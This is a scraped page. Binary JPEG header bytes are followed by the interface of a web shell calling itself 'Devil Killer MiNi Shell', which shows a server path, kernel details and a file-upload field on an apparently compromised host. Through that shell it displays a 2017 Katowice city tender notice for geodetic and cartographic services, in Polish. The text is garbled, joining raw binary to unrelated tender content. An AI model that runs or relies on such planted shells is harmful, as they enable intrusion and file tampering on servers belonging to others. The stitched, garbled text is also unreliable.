JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20170202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20170202/18873-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.katowice.eu' target='_blank'>http://bip.katowice.eu</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 18873 - 2017
              z dnia 2017-02-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Katowice: Wykonywanie usług geodezyjno-kartograficznych w roku 2017 na terenie Miasta Katowice.

Zamówienie dzieli się na dwa zadania (części) :
Zadanie nr 1 -      wykonywanie usług geodezyjno-kartograficznych położonych w obrębie:  Ligota, Piotrowice, Zarzecze, Podlesie, Górne Lasy Pszczyńskie, Mysłowice  Las
Zadanie nr 2 -      wykonywanie usług geodezyjno-kartograficznych położonych w obrębie: Tysiąclecie, Śródmieście  Załęże, Dąbrówka Mała, Bogucice-Zawodzie, Roździeń, Szopienice, Janów<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Katowice, krajowy numer identyfikacyjny
              , ul.
              ul. Młyńska 
              4,
              40098  
              Katowice, woj.
              śląskie, państwo
              Polska, tel.
              +48 32 2593302, e-mail
              bzp@um.katowice.pl, faks
              48 327 054 949.
              <br />
              Adres strony internetowej (URL): http://katowice.eu<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.katowice.eu</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.katowice.eu</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę sporządzoną w języku polskim należy złożyć osobiście lub przesłać na adres podany poniżej.<br />
                Adres:
                <br />Urząd Miasta Katowice Wydział Gospodarki Mieniem 40-098 Katowice, ul.Młyńska 4, VI piętro, pokój 611</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonywanie usług geodezyjno-kartograficznych w roku 2017 na terenie Miasta Katowice.

Zamówienie dzieli się na dwa zadania (części) :
Zadanie nr 1 -      wykonywanie usług geodezyjno-kartograficznych położonych w obrębie:  Ligota, Piotrowice, Zarzecze, Podlesie, Górne Lasy Pszczyńskie, Mysłowice  Las
Zadanie nr 2 -      wykonywanie usług geodezyjno-kartograficznych położonych w obrębie: Tysiąclecie, Śródmieście  Załęże, Dąbrówka Mała, Bogucice-Zawodzie, Roździeń, Szopienice, Janów<br /><b>Numer referencyjny: </b>BZP.271.1.15.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Wykonywanie usług geodezyjno-kartograficznych w roku 2017 na terenie Miasta Katowice.
Zamówienie dzieli się na dwa zadania (części) :
Zadanie nr 1 - wykonywanie usług geodezyjno rtograficznych położonych w obrębie: Ligota, Piotrowice, Zarzecze, Podlesie, Górne Lasy Pszczyńskie, Mysłowice  Las w podanych poniżej ilościach w tym:
I. DOKUMENTACJA GEODEZYJNA I PRAWNA DLA CELÓW REGULACJI STANÓW
PRAWNYCH
1) Sporządzanie uwierzytelnionego wykazu synchronizacyjnego wykazu zmian danych ewidencyjnych)
- pierwsza działka w wykazie 12
- każda następna działka w wykazie 41
2) Sporządzenie mapy dla celów prawnych według stanu prawnego aktualnego na dany dzień
a) na bazie mapy zasadniczej (S+U+E) wraz z wypisem z rejestru gruntów i budynków:
- pierwsza działka w zleceniu 5
- każda następna działka w zleceniu 1
b) sporządzenie dokumentacji geodezyjnej obrazującej w terenie położenie budynków (budowli) w tym garaży
z oznakowaniem numeracji na podstawie wskazania
w terenie przez użytkowników z obliczeniem powierzchni erenu (części działek), niezbędnego do korzystania budynku na każdorazowe żądanie zamawiającego w zleceniu
- od 1 do 10 budynków (budowli) w zleceniu	55
- powyżej 10 budynków (budowli) w zleceniu 1
c) na bazie mapy zasadniczej (S+U+E)
z obliczeniem powierzchni terenu (części działek)
przeznaczonych do przekazania w użytkowanie,
trwały zarząd oraz dzierżawę (wraz z ustaleniem
użytkownika dla potrzeb dzierżaw) i określenie
zakresu władania, użyczenia, służebności gruntowej,
służebności przesyłu
- dla terenu o pow. do 5000m2 210
- dla terenu o pow. od 5000m2 do 10000m2 5
- dla terenu o pow. powyżej 10000m2 1
3) Badanie księgi wieczystej: 2
4) Sporządzenie uwierzytelnionego wypisu z ewidencji gruntów i budynków wg stanu na wskazany w zleceniu dzień:
- wypis z ewidencji gruntów wg stanu na wskazany w zleceniu dzień 4
5) Sporządzenie uwierzytelnionego wykazu zmian gruntowych wraz z wyrysem obrazującym kolejne zmiany wynikające z tego wykazu
- pierwsza działka w wykazie	3
- każda następna działka w wykazie zmian gruntowych 
 
 	2
6) Ustalenie podstawy nabycia prawa własności nieruchomości na rzecz Skarbu Państwa na podstawie badania księgi wieczystej lub operatu ewidencji gruntów wraz z dokumentacją potwierdzającą dokonanie ustalenia (w tym fotograficzną)
- pierwsza księga w zleceniu 5
- każda następna księga w zleceniu 1
II. AKTUALIZACJA MAPY ZASADNICZEJ:
a) mająca na celu ustalenie faktycznego stanu 8
zagospodarowania (pomiary, wyburzenia, rozbiórki)
b) do celów projektowych 1 
                                    

 
III. POZYSKANIE DANYCH NIEZBĘDNYCH DO
 
UJAWNIENIA BUDYNKU W KW
     
W ODNIESIENIU DO:
- jednego budynku 10

 
IV. WSKAZANIE GRANIC POPRZEZ:
 
a) wznowienie granic
- do 4 punktów w zleceniu 18
- każdy następny punkt w zleceniu 10
 
b) w przypadku braku danych wznowienie granic wraz
     
z rozgraniczeniem
- do 4 punktów w zleceniu 5
- każdy następny punkt w zleceniu 3
      
- każdy rozgraniczany punkt w zleceniu 2

 
V. PODZIAŁ GEODEZYJNY
- dwie pierwsze nowopowstałe działki w zleceniu 50
- każda następna nowopowstała działka w zleceniu 10

 
 
VI. AKTUALIZACJA UŻYTKÓW GRUNTOWYCH
 
 
W TYM:
wykaz zmian danych ewidencyjnych dot. zmiany użytku plus mapa zmiany użytku
- dwie pierwsze działki w zleceniu 10
 
- każda następna działka w zleceniu 3

 
 
VII. PODZIAŁ GEODEZYJNY Z
 
ROZGRANICZENIEM
 
NIERUCHOMOŚCI
- dwie pierwsze nowopowstałe działki w zleceniu (ryczałt) 3
- każda następna nowopowstała działka w zleceniu 2
 
- każdy rozgraniczony punkt w zleceniu 2

 
 
VIII. SPORZĄDZENIE NA POTRZEBY
 
PROWADZONYCH TYPOWYCH
       
POSTĘPOWAŃ SĄDOWYCH I
 
ADMINISTRACYJNYCH MAPY Z PROJEKTEM
       
PODZIAŁU NIERUCHOMOŚCI
 
- dwie pierwsze nowopowstałe działki w zleceniu
 
(ryczałt) 4
 

 
Zadanie nr 2 - wykonywanie usług geodezyjno-
 
kartograficznych w obrębie: Tysiąclecie, 
 
Śródmieście  Załęże, Dąbrówka Mała, Bogucice-
 
Zawodzie, Roździeń, Szopienice, Janów w podanych
 
poniżej ilościach w tym:
I. DOKUMENTACJA GEODEZYJNA I PRAWNA DLA CELÓW REGULACJI STANÓW
PRAWNYCH
1) Sporządzanie uwierzytelnionego wykazu synchronizacyjnego (wykazu zmian danych ewidencyjnych):
- pierwsza działka w wykazie 11
- każda następna działka w wykazie 31
2) Sporządzenie mapy dla celów prawnych wg stanu prawnego  aktualnego na dany dzień
a) na bazie mapy zasadniczej (S+U+E) wraz z wypisem
z rejestru gruntów i budynków:
- pierwsza działka w zleceniu 5
- każda następna działka w zleceniu 1
b) sporządzenie dokumentacji geodezyjnej obrazującej w terenie położenie budynków (budowli) w tym garaży
z oznakowaniem numeracji na podstawie wskazania
w terenie przez użytkowników z obliczeniem powierzchni terenu (części działek), niezbędnego do korzystania z budynku na każdorazowe żądanie zamawiającego w zleceniu
- od 1 do 10 budynków (budowli) w zleceniu	59
- powyżej 10 budynków (budowli) w zleceniu 1
c) na bazie mapy zasadniczej (S+U+E)
z obliczeniem powierzchni terenu (części działek)
przeznaczonych do przekazania w użytkowanie,
trwały zarząd oraz dzierżawę (wraz z ustaleniem
użytkownika dla potrzeb dzierżaw) i określenie
zakresu władania, użyczenia, służebności gruntowej,
służebności przesyłu
- dla terenu o pow. do 5000m2 220
- dla terenu o pow. od 5000m2 do 10000m2 41
- dla terenu o pow. powyżej 10000m2 1
3) Badanie księgi wieczystej:	2
4) Sporządzenie uwierzytelnionego wypisu z ewidencji gruntów
i budynków wg stanu na wskazany w zleceniu dzień:
- wypis z ewidencji gruntów wg stanu na
wskazany w zleceniu dzień 4
5) Sporządzenie uwierzytelnionego wykazu zmian gruntowych wraz
z wyrysem obrazującym kolejne zmiany wynikające
z tego wykazu
- pierwsza działka w wykazie	3
- każda następna działka w wykazie zmian gruntowych 2
6) Ustalenie podstawy nabycia prawa własności nieruchomości
na rzecz Skarbu Państwa na podstawie badania księgi
wieczystej lub operatu ewidencji gruntów wraz z dokumentacją
potwierdzającą dokonanie ustalenia (w tym fotograficzną)
- pierwsza księga w zleceniu 3
- każda następna księga w zleceniu 2

 
II. AKTUALIZACJA MAPY ZASADNICZEJ:
a) mająca na celu ustalenie faktycznego stanu	3
zagospodarowania (pomiary, wyburzenia, rozbiórki)
b) do celów projektowych 1

 
 
 
III. POZYSKANIE DANYCH NIEZBĘDNYCH DO
 
UJAWNIENIA BUDYNKU KW W ODNIESIENIU
 
DO:
- jednego budynku 3

 
IV. WSKAZANIE GRANIC POPRZEZ:
 
a) wznowienie granic
- do 4 punktów w zleceniu 17
- każdy następny punkt w zleceniu 18
 
b) w przypadku braku danych wznowienie granic wraz
 
z rozgraniczeniem
- do 4 punktów w zleceniu 4
- każdy następny punkt w zleceniu 6
 
- każdy rozgraniczany punkt w zleceniu 3

 
V. PODZIAŁ GEODEZYJNY
- dwie pierwsze nowopowstałe działki w zleceniu	48
- każda następna nowopowstała działka w zleceniu 30
 
VI. AKTUALIZACJA UŻYTKÓW GRUNTOWYCH
 
W TYM:
wykaz zmian danych ewidencyjnych dot. zmiany użytku plus mapa zmiany użytku
 
- dwie pierwsze działki w zleceniu 9
 
- każda następna działka w zleceniu	4

 
VII. PODZIAŁ GEODEZYJNY Z
 
ROZGRANICZENIEM NIERUCHOMOŚCI
- dwie pierwsze nowopowstałe działki w zleceniu (ryczałt)	2
- każda następna nowopowstała działka w zleceniu 2
 
- każdy rozgraniczony punkt w zleceniu 2
<br /><br /><b>II.5) Główny kod CPV: </b>71250000-5<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              276423.00<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamówienia zostaną udzielone na podstawie cen jednostkowych za poszczególny rodzaj prac określonych przez Wykonawcę w zamówieniu podstawowym w nw. wielkościach (wielkości orientacyjne):
a) Zadanie nr 1 - wykonywanie usług geodezyjno-kartograficznych położonych w obrębie: Ligota, Piotrowice, Zarzecze, Podlesie, Górne Lasy Pszczyńskie, Mysłowice  Las w podanych poniżej ilościach w tym:

 

 
I. DOKUMENTACJA GEODEZYJNA I PRAWNA DLA CELÓW REGULACJI STANÓW
PRAWNYCH
1) Sporządzanie uwierzytelnionego wykazu synchronizacyjnego (wykazu zmian danych
ewidencyjnych)
- pierwsza działka w wykazie 5
- każda następna działka w wykazie 10
2) Sporządzenie mapy dla celów prawnych według
stanu prawnego aktualnego na dany dzień
a) na bazie mapy zasadniczej (S+U+E) wraz z wypisem z rejestru gruntów i budynków:
- pierwsza działka w zleceniu 5
- każda następna działka w zleceniu 1
b) sporządzenie dokumentacji geodezyjnej obrazującej w terenie położenie budynków (budowli) w tym garaży
z oznakowaniem numeracji na podstawie wskazania
w terenie przez użytkowników z obliczeniem powierzchni terenu (części działek), niezbędnego do korzystania z budynku na każdorazowe żądanie zamawiającego w zleceniu
- od 1 do 10 budynków (budowli) w zleceniu	10
- powyżej 10 budynków (budowli) w zleceniu 1
c) na bazie mapy zasadniczej (S+U+E)
z obliczeniem powierzchni terenu (części działek)
przeznaczonych do przekazania w użytkowanie,
trwały zarząd oraz dzierżawę (wraz z ustaleniem
użytkownika dla potrzeb dzierżaw) i określenie
zakresu władania, użyczenia, służebności gruntowej,
służebności przesyłu
- dla terenu o pow. do 5000m2 50
- dla terenu o pow. od 5000m2 do 10000m2 5
- dla terenu o pow. powyżej 10000m2 1
3) Badanie księgi wieczystej: 2
4) Sporządzenie uwierzytelnionego wypisu z ewidencji gruntów i budynków wg stanu na wskazany w zleceniu dzień:
- wypis z ewidencji gruntów wg stanu na wskazany w zleceniu dzień 4
5) Sporządzenie uwierzytelnionego wykazu zmian gruntowych wraz z wyrysem obrazującym kolejne zmiany wynikające z tego wykazu
- pierwsza działka w wykazie	3
- każda następna działka w wykazie zmian gruntowych 
 
 	2
6) Ustalenie podstawy nabycia prawa własności nieruchomości na rzecz Skarbu Państwa na podstawie badania księgi wieczystej lub operatu ewidencji gruntów wraz z dokumentacją potwierdzającą dokonanie ustalenia (w tym fotograficzną)
- pierwsza księga w zleceniu 5
- każda następna księga w zleceniu 1

II. AKTUALIZACJA MAPY ZASADNICZEJ:
a) mająca na celu ustalenie faktycznego stanu 2
zagospodarowania (pomiary, wyburzenia, rozbiórki)
b) do celów projektowych 1 
                                    

 
III. POZYSKANIE DANYCH NIEZBĘDNYCH DO
 
UJAWNIENIA BUDYNKU W KW 
 
W ODNIESIENIU DO:
- jednego budynku 1

 
IV. WSKAZANIE GRANIC POPRZEZ:
 
a) wznowienie granic
- do 4 punktów w zleceniu 5
- każdy następny punkt w zleceniu 1
 
b) w przypadku braku danych wznowienie granic wraz
z rozgraniczeniem
- do 4 punktów w zleceniu 1
- każdy następny punkt w zleceniu 1
 
- każdy rozgraniczany punkt w zleceniu 1

 
V. PODZIAŁ GEODEZYJNY
- dwie pierwsze nowopowstałe działki w zleceniu 20
- każda następna nowopowstała działka w zleceniu 5

 
 
VI. AKTUALIZACJA UŻYTKÓW GRUNTOWYCH
 
W TYM:
wykaz zmian danych ewidencyjnych dot. zmiany użytku plus mapa zmiany użytku
- dwie pierwsze działki w zleceniu 5
 
- każda następna działka w zleceniu 3
 

 
VII. PODZIAŁ GEODEZYJNY Z
 
ROZGRANICZENIEM NIERUCHOMOŚCI
- dwie pierwsze nowopowstałe działki w zleceniu (ryczałt) 3
- każda następna nowopowstała działka w zleceniu 2
 
- każdy rozgraniczony punkt w zleceniu 2
 

 
 
VIII. SPORZĄDZENIE NA POTRZEBY
 
PROWADZONYCH TYPOWYCH
       
POSTĘPOWAŃ SĄDOWYCH I
 
ADMINISTRACYJNYCH MAPY Z PROJEKTEM
       
PODZIAŁU NIERUCHOMOŚCI
 
- dwie pierwsze nowopowstałe działki w zleceniu
 
(ryczałt) 4

 
b) Zadanie nr 2 - wykonywanie usług geodezyjno-
 
kartograficznych w obrębie: Tysiąclecie,
 
Śródmieście  Załęże, Dąbrówka Mała, Bogucice-
 
Zawodzie, Roździeń, Szopienice, Janów w podanych
 
poniżej ilościach w tym:

 
I. DOKUMENTACJA GEODEZYJNA I PRAWNA DLA CELÓW REGULACJI STANÓW
PRAWNYCH
1) Sporządzanie uwierzytelnionego wykazu synchronizacyjnego (wykazu zmian danych
ewidencyjnych):
- pierwsza działka w wykazie 5
- każda następna działka w wykazie 10
2) Sporządzenie mapy dla celów prawnych wg stanu prawnego aktualnego na dany dzień
a) na bazie mapy zasadniczej (S+U+E) wraz z wypisem
z rejestru gruntów i budynków:
- pierwsza działka w zleceniu 5
- każda następna działka w zleceniu 1
b) sporządzenie dokumentacji geodezyjnej obrazującej w terenie położenie budynków (budowli) w tym garaży
z oznakowaniem numeracji na podstawie wskazania
w terenie przez użytkowników z obliczeniem powierzchni terenu (części działek), niezbędnego do korzystania z budynku na każdorazowe żądanie zamawiającego w zleceniu
- od 1 do 10 budynków (budowli) w zleceniu	10
- powyżej 10 budynków (budowli) w zleceniu 1
c) na bazie mapy zasadniczej (S+U+E)
z obliczeniem powierzchni terenu (części działek)
przeznaczonych do przekazania w użytkowanie,
trwały zarząd oraz dzierżawę (wraz z ustaleniem
użytkownika dla potrzeb dzierżaw) i określenie
zakresu władania, użyczenia, służebności gruntowej,
służebności przesyłu
- dla terenu o pow. do 5000m2 50
- dla terenu o pow. od 5000m2 do 10000m2 5
- dla terenu o pow. powyżej 10000m2 1
3) Badanie księgi wieczystej:	2
4) Sporządzenie uwierzytelnionego wypisu z ewidencji gruntów i budynków wg stanu na wskazany w zleceniu dzień:
- wypis z ewidencji gruntów wg stanu na
wskazany w zleceniu dzień 4
5) Sporządzenie uwierzytelnionego wykazu zmian gruntowych wraz  z wyrysem obrazującym kolejne zmiany wynikające z tego wykazu
- pierwsza działka w wykazie	3
- każda następna działka w wykazie zmian gruntowych 
 
  	2
6) Ustalenie podstawy nabycia prawa własności nieruchomości  na rzecz Skarbu Państwa na podstawie badania księgi wieczystej lub operatu ewidencji gruntów wraz z dokumentacją potwierdzającą dokonanie ustalenia (w tym fotograficzną)
- pierwsza księga w zleceniu 5
- każda następna księga w zleceniu 1

 
II. AKTUALIZACJA MAPY ZASADNICZEJ:
a) mająca na celu ustalenie faktycznego stanu	2
zagospodarowania (pomiary, wyburzenia, rozbiórki)
b) do celów projektowych 1

 

 
 
III. POZYSKANIE DANYCH NIEZBĘDNYCH DO
 
UJAWNIENIA BUDYNKU
     
W KW W ODNIESIENIU DO:
- jednego budynku 1

 
IV. WSKAZANIE GRANIC POPRZEZ:
 
a) wznowienie granic
- do 4 punktów w zleceniu 5
- każdy następny punkt w zleceniu 1
 
 
b) w przypadku braku danych wznowienie granic wraz
 
z rozgraniczeniem
- do 4 punktów w zleceniu 1
- każdy następny punkt w zleceniu 1
      
- każdy rozgraniczany punkt w zleceniu 1

 
V. PODZIAŁ GEODEZYJNY
- dwie pierwsze nowopowstałe działki w zleceniu	20
- każda następna nowopowstała działka w zleceniu 5
 
VI. AKTUALIZACJA UŻYTKÓW GRUNTOWYCH
 
W TYM:
wykaz zmian danych ewidencyjnych dot. zmiany użytku plus mapa zmiany użytku
- dwie pierwsze działki w zleceniu 5
 
- każda następna działka w zleceniu	3

 
VII. PODZIAŁ GEODEZYJNY Z
 
ROZGRANICZENIEM NIERUCHOMOŚCI
- dwie pierwsze nowopowstałe działki w zleceniu (ryczałt)	3
- każda następna nowopowstała działka w zleceniu 2
 
- każdy rozgraniczony punkt w zleceniu 2
